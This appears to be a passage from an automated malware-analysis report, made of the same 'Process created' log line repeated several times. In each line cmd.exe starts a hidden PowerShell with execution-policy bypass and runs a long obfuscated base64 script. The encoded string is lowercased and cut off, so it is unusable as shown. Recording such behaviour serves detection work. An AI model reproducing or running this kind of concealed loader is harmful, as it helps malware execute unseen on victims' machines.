pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dx